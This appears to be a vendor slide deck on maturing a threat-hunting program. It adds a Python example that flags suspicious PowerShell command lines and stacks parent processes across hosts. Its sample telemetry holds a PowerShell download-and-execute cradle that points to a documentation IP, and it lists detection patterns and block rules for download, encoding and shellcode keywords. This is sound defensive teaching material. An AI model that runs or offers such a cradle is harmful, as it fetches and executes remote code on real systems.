Total Endpoint Protection: #1 in EDR & Next-Gen AV
Threat Hunting 102: Beyond The Basics, Maturing Your Threat Hunting Program
Who Am I?
Jayson Wehrend
Senior Sales Engineer, Cybereason
Former Tech Consultant, RSA
Why We’re Here Today
o Quick hunting refresher
o I’m hunting! Now what?
o Giving back & process integration
o Expanded PowerShell use case
REFRESHER: HUNTING DEFINED.
The process of proactively discovering undesirable activity to elicit a positive outcome.
REFRESHER: WHY?
Prepare? It's very hard to defend what you can't see and don't understand.
Be proactive? Don't wait for the bad to happen, then have to react to fix.
Fix stuff? Especially before it breaks!
Time to Change.
"Intelligence is the ability to adapt to change." -- Stephen Hawking
The Hunting Process (a cycle)
o Motivation + Hypothesis
o Data Collection
o Tooling / Analysis
o Outcomes
o Automation
I’m Hunting! Now What?
o We’re Giving Back!
– Incidents
– Detection improvements / new collection techniques
– Prevention with confidence
– Improve response / triage
– Configuration management / compliance / audit
Incident Response Process (a cycle)
o Prepare
o Detect
o Respond
o Contain / Eradicate
o Post-Mortem / Prevent
Incident Response Process and Hunting Process, side by side
Incident Response Process: Prepare, Detect, Respond, Contain / Eradicate, Post-Mortem / Prevent
Hunting Process: Motivation + Hypothesis, Data Collection, Tooling / Analysis, Outcomes, Automation*
How the two feed each other:
o Use blind spots/gaps surfaced by incident response as sources of motivation + hypothesis
o Hunting outcomes flow back into incident response as high-fidelity detections and escalated incidents
o New data collection & analysis techniques improve triage & response SOPs
Hunting: A Deeper Dive
o Previous outcomes create new motivation + hypotheses
o Introducing new datasets expands previous outcomes
o Data stacking becomes more crucial on the journey toward analysis/data science
EXPANDED HUNTING: POWERSHELL
File-less Techniques: PowerShell
Process Execution
o Hidden / Obfuscated / Encoded
– commandLine: hidden|1|-nop|iex|Invoke-|ICM|scriptblock
– commandLine: `|1|^|+|$|*|&|.
– commandLine: nop|noni|nol|bypass|e|enc|ec
o Download Commands
– commandLine: DownloadFile|IWR|Invoke-WebRequest|IRM|Invoke-RestMethod|DownloadString|BITS
o Shellcode / DLL Execution
– commandLine: dllimport|virtualalloc
o Parent/child Profiling
– Parent: wscript|mshta|MSOffice|Browser|WMI*
Persistence
o Service = commandline:powershell or .ps*
o Registry = commandline:powershell or .ps*
Network Comms
o Int2Ext Profiling: Connections → Filter: isExternalConnection:True; URL: .ps*
o DNS Queries: TXT records (C2 channel); received vs. transmitted ratios
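The command-line, parent-process and stacking ideas from the two slides above (the "Deeper Dive" point on data stacking and the PowerShell hunting matrix), carried through as an added worked example in Python rather than the EDR query syntax on the slide. This is not Cybereason's code or query language: the record layout (host, parent, cmdline), the regexes and the sample records are constructed for the example. It also decodes -EncodedCommand payloads (UTF-16LE, then base64) and rescans them, which the slide's "Encoded" category implies but does not spell out.

```python
"""Triage PowerShell process-creation records against the hunting
categories on the slide, then stack parent processes across hosts.

Added example, not Cybereason's code or query language. The record
fields, the regexes and SAMPLE_RECORDS are constructed for illustration.
"""
import base64
import re
from collections import defaultdict

# Command-line indicator groups, following the slide's categories.
# '+', '$', '*', '&' and '.' from the obfuscation row are left out: on
# their own they match almost every command line (base64 contains '+').
INDICATORS = {
    "hidden/obfuscated": re.compile(
        r"-w(?:indowstyle)?\s+(?:hidden|1)\b|\biex\b|invoke-expression"
        r"|\bicm\b|invoke-command|scriptblock|[`^]", re.I),
    "policy/encoded": re.compile(
        r"-nop\b|-noprofile|-noni\b|-noninteractive|-nol\b|-nologo"
        r"|-e(?:p|xecutionpolicy)\s+bypass|\s-e(?:c|nc|ncodedcommand)?\s", re.I),
    "download": re.compile(
        r"downloadfile|downloadstring|\biwr\b|invoke-webrequest|\birm\b"
        r"|invoke-restmethod|bitstransfer|net\.webclient", re.I),
    "shellcode/dll": re.compile(r"dllimport|virtualalloc", re.I),
}

# Parents from the slide's profiling row: Office, script hosts, browsers, WMI.
SUSPICIOUS_PARENTS = {
    "winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe",
    "wscript.exe", "cscript.exe", "mshta.exe",
    "chrome.exe", "firefox.exe", "msedge.exe", "iexplore.exe", "wmiprvse.exe",
}

# -e / -ec / -enc / -EncodedCommand followed by a base64 blob.
ENCODED_ARG = re.compile(r"-e(?:c|nc|ncodedcommand)?\s+([A-Za-z0-9+/=]{16,})", re.I)


def decode_encoded_command(cmdline):
    """Return the plaintext of an -EncodedCommand argument, or None.
    PowerShell encodes the script as UTF-16LE before base64, so decoding
    the bytes as UTF-8 gives NUL-interleaved garbage; use utf-16le."""
    m = ENCODED_ARG.search(cmdline)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1)).decode("utf-16le")
    except (ValueError, UnicodeDecodeError):  # bad padding / odd length
        return None


def triage(record):
    """Tag one record with every indicator group it hits. An encoded
    command is decoded and rescanned, so a download cradle wrapped in
    -enc is attributed to 'download', not only to 'policy/encoded'."""
    cmd = record["cmdline"]
    decoded = decode_encoded_command(cmd)
    hits = set()
    for text in (cmd, decoded or ""):
        for name, rx in INDICATORS.items():
            if rx.search(text):
                hits.add(name)
    if record["parent"].lower() in SUSPICIOUS_PARENTS:
        hits.add("suspicious parent")
    return {"host": record["host"], "parent": record["parent"],
            "decoded": decoded, "hits": sorted(hits)}


def hunt(records):
    """Triage all records; return the ones with hits, most hits first."""
    flagged = [t for t in map(triage, records) if t["hits"]]
    return sorted(flagged, key=lambda t: len(t["hits"]), reverse=True)


def stack_parents(records, max_hosts=2):
    """Stack parent->PowerShell pairs by the number of distinct hosts.
    A parent seen on a handful of hosts is the rare tail to pull on
    first; one seen fleet-wide is usually sanctioned tooling."""
    hosts = defaultdict(set)
    for r in records:
        hosts[r["parent"].lower()].add(r["host"])
    return {p: sorted(h) for p, h in hosts.items() if len(h) <= max_hosts}


# Constructed sample telemetry (not real events). 203.0.113.10 is a
# documentation address; the cradle is encoded the way `powershell -enc`
# expects, so the decoder is exercised end to end.
CRADLE = "IEX (New-Object Net.WebClient).DownloadString('http://203.0.113.10/a.ps1')"
ENCODED = base64.b64encode(CRADLE.encode("utf-16le")).decode("ascii")

SAMPLE_RECORDS = [
    {"host": "ws01", "parent": "WINWORD.EXE",
     "cmdline": f"powershell.exe -nop -w hidden -enc {ENCODED}"},
    {"host": "ws02", "parent": "wscript.exe",
     "cmdline": r"powershell.exe -ep bypass -File \\fs01\share\update.ps1"},
    {"host": "ws03", "parent": "explorer.exe",
     "cmdline": "powershell.exe -NoProfile -Command Get-Process"},
] + [
    {"host": h, "parent": "services.exe",
     "cmdline": r"powershell.exe -NonInteractive -File C:\Scripts\backup.ps1"}
    for h in ("srv01", "srv02", "srv03")
]

if __name__ == "__main__":
    for t in hunt(SAMPLE_RECORDS):
        print(t["host"], t["parent"], t["hits"])
        if t["decoded"]:
            print("    decoded:", t["decoded"])
    print("rare parents:", stack_parents(SAMPLE_RECORDS))
```

The Word-spawned record carries nothing but switches and a base64 blob on its command line; only after decoding does it light up the download group, which is why the rescan matters more than any single keyword. The stacking pass is deliberately coarse: the same services.exe launch on every server drops out, and the three one-off parents are what is left to look at.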
Giving Back…Incident Escalation
o Incident 1: PowerShell WebClient – downloading a stage 2 payload
o Incident 2: Remote .ps file execution / invoking shellcode
o Incident 3: Mismatched services – adversarial use of .ps
o Incident 4: Data exfil – PowerShell BITSTransfer
Giving Back…Prevention
o Block execution of PowerShell.exe on all systems where it is not in use for administrative purposes
o Enforce specific parent/child process relationships: block MSOffice|Wscript|Mshta|Browsers|WMI from spawning PowerShell.exe
o Anchor PowerShell scripts to specific server directories and block .ps* files from running directly on a system
o Use the endpoint firewall to prevent PowerShell.exe from connecting to non-approved IPs
o Block "Bypass", "Hidden", "DownloadString", "WebClient", "DLLImport" and "VirtualAlloc" as command-line arguments for execution by an unauthorized user (the obfuscation patterns on the hunting slide show why this is a tripwire, not a boundary)
o See #2 for allowing valid applications
Thank you! Questions?
jayson.wehrend@cybereason.com
@cybereason
